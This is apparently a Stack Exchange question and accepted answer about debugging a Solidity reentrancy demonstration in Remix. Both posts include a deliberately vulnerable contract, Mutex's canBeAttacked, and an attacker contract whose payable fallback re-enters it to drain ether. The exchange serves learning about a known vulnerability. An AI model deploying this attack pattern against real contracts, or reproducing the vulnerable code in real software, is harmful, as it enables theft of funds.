# "The constructor should be payable if you send value. Debug the transaction to get more information. " error

Tags: solidity

hi i was trying to replicate reentracy attack that can exploit etherum contract

Below is the code

```
 pragma solidity ^0.4.19;
 contract Mutex {
 bool locked;


modifier noReentrancy() {
require(!locked);
locked = true;
_;
locked = false;
}

 function Mutex() public payable {
   locked=false;
}

function canBeAttacked() public  returns (uint) {
require(msg.sender.call.value(1 ether)());
return 7;
 }

/// This function is protected by a mutex
  function f() public noReentrancy returns (uint) {
require(msg.sender.call());
  return 7;
  }
 }

  contract attacker{
      bool again=false;
function attacker() public  {

   }   
      function() public  payable{
             if(!again){
              again=true;
            Mutex(msg.sender).canBeAttacked();
         }
     }
   function payment(Mutex mutex) public {
        mutex.canBeAttacked();
    }
 }
```

But when ever i click call payment method of attacker contract (Deployed on Virtual VM java script on remix) i get the following error

transact to attacker.payment errored: VM error: revert.
revert  The transaction has been reverted to the initial state.
Note: The constructor should be payable if you send value.  Debug the transaction to get more information.

What is wrong with this code?

Answer (score 2, accepted):

Two issues that I can spot without actually running the code:

1. The fallback function in `attacker` isn't `payable`, so it will revert when called by `Mutex`.
2. The fallback function always calls back into `Mutex`, so this is an infinite recursive loop. Either `Mutex` will run out of ether or the transaction will run out of gas. Either way, the `require(msg.sender.call...)` line in `Mutex` will revert.

**EDIT**

Fixed code below. (I added a `getBalance` function just to make it easy in Remix to verify that things worked.)

```
pragma solidity ^0.4.21;

contract Mutex {
    bool locked;
    modifier noReentrancy() {
        require(!locked);
        locked = true;
        _;
        locked = false;
    }

    function Mutex() public payable { }

    function canBeAttacked() public returns (uint) {
        require(msg.sender.call.value(1 ether)());
        return 7;
    }

    // This function is protected by a mutex
    function f() public noReentrancy returns (uint) {
        require(msg.sender.call());
        return 7;
    }
}

contract Attacker {
    function () public payable {
        if (msg.sender.balance >= 1 ether) {
            Mutex(msg.sender).canBeAttacked();
        }
    }

    function payment(Mutex mutex) public {
        mutex.canBeAttacked();
    }

    function getBalance() public view returns (uint256) {
        return address(this).balance;
    }
}
```

Comment: Hi i just updated my code it is still throwing the same error,have a look at the code now.

Comment: I just ran your code it has the same problem,

Comment: Just a wild guess, but maybe you're failing to enclose the address of `Mutex` in double quotes when you pass it to `payment`?

Comment: (My code works correctly for me in Remix.)

Comment: Your updated code also runs successfully for me in Remix.

Comment: Man, you are correct I was not enclosing it in quotes.Novice mistakes.Thanx man.Now let me check my code hope it works

Comment: Dude it worked for me too.Cheers

Comment: Let us [continue this discussion in chat](https://chat.stackexchange.com/rooms/74519/discussion-between-prashank-and-smarx).